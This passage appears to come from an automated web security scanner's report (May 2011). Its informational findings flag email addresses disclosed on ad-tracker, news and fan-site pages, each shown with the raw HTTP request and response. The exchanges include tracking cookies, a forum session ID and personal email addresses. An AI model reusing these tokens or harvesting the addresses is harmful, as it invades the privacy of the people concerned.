Referer: http://bcp.crwdcntrl.net/px?Yz00MTYmcHhpZD02MDY4JnB4aWQ9NTQ3JnB4aWQ9NTc3MiZweGlkPTQ2OCZweGlkPTExMzY%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjQ5NPGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AbZJJsoQgEETvwtoFoKjRt3GeGAQcWpu%2BewMahv7420dWVlUWH7Bg8PqAodpWoUoNXqBo27SRMFsMkrSZmMEmD6QM99WCNFTUAkSCouVkwKQWlrIcVpbi8qLsD6Vxt8URt7SEMzXIwEvKH9LxvUj7rlC%2FRF6mh3AanURy5ICJmICu2k457p0dSkWLkHfLjjwsNdbKlo5bzbnJDELTHui0jplrQ%2Fr30aaWlHivEd%2B84qR4eKmVstkRnSRe5oB2YEzKw6jreHjUeIVB%2FQCv0abmn2BIf2xBxeFAK2ojkPm0CpOYOA%2BD8yatC2Lv2%2FKc8IDiDhUT3J9EluldVWEHW9icoSI8%2B%2FUH4gAIQJ5xXqnOfwHw%2Ff4A"; vsd=0@1@4dcbe146@www.milehighonthecheap.com

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 12 May 2011 13:32:16 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: ut="1%3AbZLLsoMgEET%2FhTULQFErfxPjWx4CRhND%2Fj0MWrnJrWxPNT09PTzQwtDpgcb6vmpbOXRCl64rWkPOi6dGtLP0zJfYmGRbAygSKwKgHF86xUfGGx2oLEkdKKveVP6k6h8VWX%2FPUqAVuQpPPcFuTOYJZEZRAD6VmhA83RYTBJYOSxp1MeW09SGUTRdtDhjn9PxrjmPOBq%2Fp3ijlz57SecOuaDIJfny47XMbI3j0mtiHV5ZfvrzsKuQViMvzQwZLcAgLb12EoHKgmvJqd%2B97lexG8Zmnw0jeeef2Ry982FcTencQtQgFmHJetc99Vib4OFQHdW1DV%2F31EqD%2BhFZqFe9kquJTVTOAHWmP6im7xk5GDgBhVJ6Vqm0f%2FwV6Pl8%3D"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 13:32:16 GMT
Set-Cookie: vsd=0@1@4dcbe160@bcp.crwdcntrl.net; path=/; domain=.adbrite.com; expires=Sat, 14-May-2011 13:32:16 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
16.3. http://ads.adbrite.com/adserver/behavioral-data/8203  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8203

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/behavioral-data/8203?d=2716 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zMTMmcHhpZD01ODE1JnB4aWQ9MTAwMSZweGlkPTUzJnB4aWQ9NDcyJnB4aWQ9NjA0MQ%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjQ5NPGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZHJloMgEEX%2FhbULQFFP%2FkbjzCSDGg359wDpdGtvb91XvDo8wYrB7Qlou29SNwbcgN4YXxxS3BSFQw4mAZgA5qKJ4D4MZa9gtXrIessddnVixlGkwaphjDk0URhcQSgmtv%2BMWu%2FiJlEqPTZPylQzTxD5ep28eF%2FKL9SwljFPartJV7i8Tn9F8S%2FO8nHPs0AbuLBz%2B2H28JiGz0nzY1V%2BrNG0ZhEYmtpgcCVQPCfjEv6F5TmsuRSxt2rKnydim5Fca2Oj%2Fa5574RwlUPIHokpu5yHd8n0OLdrcYgOsD%2Fty4v7dR9FeIlZSoIGElBXQrR6jP8IXq83"; vsd=0@1@4dcbc6b1@cdn.turn.com

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 12 May 2011 13:31:36 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: ut="1%3AXZFJtoMgFET3wtgBoKgnu9HYoNII2ERD9h4gyT%2F4p9eqV1X4BBsGtyeY2mOXujHgBvTO%2BGqR4qYoLLIw8cB4MBdNAHdKy17BanOQ9Qu32NaJGQaRelUNg82icYJeK8iEydJ%2FPrVOi5tEqfTcHSlTzRxBxOlYPhxkdFRnm5TfoGDu5MX8o%2FxCDWsZc6RedmkLm9fpn1D8s%2FukPPO0gSuLJ9HZwXOkl51UxtBM6eJVXAkUdmZcup3zY1PulEbjln1ejUsRequmjMcM5FobG%2B3uzEcnhK0sQsuZmLLLub9FxkdcpMXeSmH%2FLYLwGlQTiQLy4h4HgATUlRCtHsLPBa%2FXGw%3D%3D"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 13:31:36 GMT
Set-Cookie: vsd=0@1@4dcbe138@bcp.crwdcntrl.net; path=/; domain=.adbrite.com; expires=Sat, 14-May-2011 13:31:36 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
16.4. http://arstechnica.com/public/shared/scripts/da-1.5.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://arstechnica.com
Path:   /public/shared/scripts/da-1.5.js

Issue detail

The following email address was disclosed in the response:

Request

GET /public/shared/scripts/da-1.5.js HTTP/1.1
Host: arstechnica.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199748606.1305051745.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199748606.420037276.1305051745.1305051745.1305051745.1; phpbb3_5qbzr_u=1; phpbb3_5qbzr_k=; phpbb3_5qbzr_sid=15183fa6ce53f5ab42a35606030e6bc4

Response

HTTP/1.1 200 OK
X-ID: .13/vm3
Vary: Accept-Encoding
Last-Modified: Wed, 11 May 2011 20:14:45 GMT
ETag: "2905485989"
Content-Type: application/x-javascript
Server: Joost NRG/0.0.1
X-Powered-By: Rainbows and unicorns
Date: Thu, 12 May 2011 13:27:50 GMT
X-Varnish: 999515418 998455893
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT
Content-Length: 11719

/*    CondeNet: AdLoader v.1.5 (2/2009)
   By: esmiling@condenet.com
   Documentation: http://wiki.conde-dev.com:8081/display/prod/DOM+Based+Advertisement+Loading+Technique
*/

/* NAMESPACES USED */
cnp = window.cnp || {};
cnp.ad = {};
cnp.util = {};

/* CONSTANTS */
cnp
...[SNIP]...
16.5. http://bstats.adbrite.com/click/bstats.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /click/bstats.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /click/bstats.gif?bapid=6388&uid=768910&kid=43105999 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9waXhlbC5tYXRodGFnLmNvbS9kYXRhL2ltZz9tdF9pZD0xMDAxMzQmbXRfZGNpZD0yNCZ2MT0mdjI9JnYzPSZzMT0mczI9JnMzIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2JzdGF0cy5hZGJyaXRlLmNvbS9jbGljay9ic3RhdHMuZ2lmP2JhcGlkPTYzODgmdWlkPTc2ODkxMCZraWQ9NDMxMDU5OTkiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD0yNCIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2EuY29sbGVjdGl2ZS1tZWRpYS5uZXQvZGF0YXBhaXI%2FbmV0PWV4JnNlZ3M9MTUmb3A9YWRkIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=97ff285f8e77e8edbb026a8559ac3e76
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjQ5NPGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZFJtoMgFET3wtgBoKgnu9HYoNII2ERD9h4gyT%2F4p9eqV1X4BBsGtyeY2mOXujHgBvTO%2BGqR4qYoLLIw8cB4MBdNAHdKy17BanOQ9Qu32NaJGQaRelUNg82icYJeK8iEydJ%2FPrVOi5tEqfTcHSlTzRxBxOlYPhxkdFRnG5PfoGDu5MX8o%2FxCDWsZc6RedmkLm9fpn1D8s%2FukPPO0gSuLJ9HZwXOkl51UxtBM6eJVXAkUdmZcup3zY1PulEbjln1ejUsRequmjMcM5FobG%2B3uzEcnhK0sQsuZmLLLub9FxkdcpMXeSmH%2FLYLwGlQTiQLy4h4HgATUlRCtHsLPBa%2FXGw%3D%3D"; vsd=0@1@4dcbe0cc@bcp.crwdcntrl.net

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: ut="1%3AXZHbkoMgEET%2FhWceAEWt%2FE2Md24CitGQfw%2BQ3Vrd1zPdPdM1L%2BAIuL0Aa%2FdNmcaCGzAbF6vHWtiy9NgjGIGNYC6bBB7DUPUa3V2AvF%2BEJ76GdhxlFlU1SjaPJ4aiVlJG6NJ%2FR23QkgZqnR1bIFVmeCCYBh0vxp1OgZrccfWzKJk7dTH%2FUnGhlrecB1Ivm%2FKlL%2BoMznKzLuVZdMmT%2F%2FLi6iKPtEErP3cc5gCPafgWn59Oh7HBk8sTsCxbokJoiVPpXCj0Z1ZnsxFKpiK6qc7XjPTag1gTsua9k9LfPcbLAW3VFSLupdPzfF1LonVA%2FSmvKB%2FXPIbJmryMRhmAoL5L2ZoxfRu83x8%3D"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 13:33:36 GMT
Set-Cookie: vsd=0@1@4dcbe1b0@loadus.exelator.com; path=/; domain=.adbrite.com; expires=Sat, 14-May-2011 13:33:36 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Thu, 12 May 2011 13:33:36 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
16.6. http://bstats.adbrite.com/click/bstats.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /click/bstats.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /click/bstats.gif?kid=47763545&bapid=10883&uid=712155 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.milehighonthecheap.com/2011/05/no-foolin-free-cat-friday-adoption-special-in-boulder/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjQ5NPGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZFJloMgFEX3wtgBoKgnu9HYIZ2ATTRk7wVYjdb0%2Fnf5PHiDFYPHG7B235RpLHgAs3GxOKSFLQqHHEwCsAFMRRPBcxjKXsNq9ZD3s3DY1YmlVKYhVcOoOTQyGLKSMEzm%2Fhy1PoubROv02DwpU8M9QcTneE53MnpqspWr70VR7tRN%2FqHiRi1vOfeknjflCpfX6W9Q%2FtPDpjwLtIELv1YaJg%2BPcTh7Tq9V%2B7FB45pFYFk6h4TQEsWOmVDwT1ZXOcLpoGchpc%2BnFErGMroprw0puXfB1vgF095J6SqH0HwktuxyES5Dxtf1yi0O6gD7y3l58byfxxBeostIiIEE1JWUraHxx8Hn8wU%3D"; vsd=0@1@4dcbe13a@loadus.exelator.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: ut="1%3AbZJbsoMgEET3wrcfgKJWduMblYeAj8SQvQcwZemt%2B3vo6Znp4Q1WDB5vMDavTeragAeoKM07BYvVIsW6mVtsy0ipeN8cyGPNHEAkqqggIyatdJSXsHEU1yflfyhL%2B1eaCEdruDCLLDyl4iadnqty7xoNaxJkZoznyUuUQB7YhEvoq92U0967oXSySnW17MnN0mCjXen0aoWwhUVo3iOTtyn3bcjwPNq0ipHgZejFK82qm5feGF88MVkWZB4YD6asPoz6XsRHTVBYNIzwHG3u%2FgmGDMcWTB4OrGEuAlXOm7SZTcs4%2Bt2E%2BiD2gda%2FCQ8or1BzKcJJVJ1fVQ32kMLuFyrCS1h%2FJB6ACJSFEI3uwxcAn88X"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 13:33:53 GMT
Set-Cookie: vsd=0@1@4dcbe1c1@www.milehighonthecheap.com; path=/; domain=.adbrite.com; expires=Sat, 14-May-2011 13:33:53 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Thu, 12 May 2011 13:33:53 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
16.7. http://cdn2-b.examiner.com/sites/default/files/js/js_LqkV37b8-egkARv7p97FuP3iNsJGDYwioPZ9WfY1sD0_72.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn2-b.examiner.com
Path:   /sites/default/files/js/js_LqkV37b8-egkARv7p97FuP3iNsJGDYwioPZ9WfY1sD0_72.js

Issue detail

The following email address was disclosed in the response:

Request

GET /sites/default/files/js/js_LqkV37b8-egkARv7p97FuP3iNsJGDYwioPZ9WfY1sD0_72.js HTTP/1.1
Host: cdn2-b.examiner.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EXAMINEREDITION=921; __utmz=109783377.1305207036.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=109783377.2080855934.1305207036.1305207036.1305207036.1; __utmc=109783377; __utmb=109783377.1.10.1305207036; s_cc=true; s_visit=1; s_lv=1305207037528; s_lv_s=First%20Visit; s_dlv=First%20Visit; s_sq=%5B%5BB%5D%5D; __utmx=109783377.00014856530318718587:1:1; __utmxx=109783377.00014856530318718587:3831945:2592000

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 13:30:39 GMT
ETag: "1a4cef4b-bf2-4a28bd7789380+gzip"
Expires: Thu, 26 May 2011 13:30:39 GMT
Last-Modified: Thu, 05 May 2011 18:50:06 GMT
Server: ECS (dca/5338)
Vary: Accept-Encoding
X-Cache: HIT
X-WebNode: web6.b.examiner.com
Content-Length: 3058

// $Id$
/**
* Addthis 0.2
* (c)2009 Brent Wong
*
* Usage:
* $.addthis();
* -or-
* $.addthis('username');
* where username is your AddThis username. Useful for tracking statistics
*/
(func
...[SNIP]...
<brian@cherne.net>
...[SNIP]...
16.8. http://fridaythe13thfilms.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fridaythe13thfilms.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: fridaythe13thfilms.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:34 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.3
X-Pingback: http://fridaythe13thfilms.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 2452

<HTML>
<HEAD>
<TITLE>Friday the 13th: The Website</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></HEAD>
<LINK REL="SHORTCUT ICON" HREF="http://www.fridaythe13thfi
...[SNIP]...
<a href="mailto:f13admin@gmail.com">f13admin@gmail.com</a>
...[SNIP]...
16.9. http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://orangeorb.blogspot.com
Path:   /2011/05/planets-align-on-friday-13th-and.html

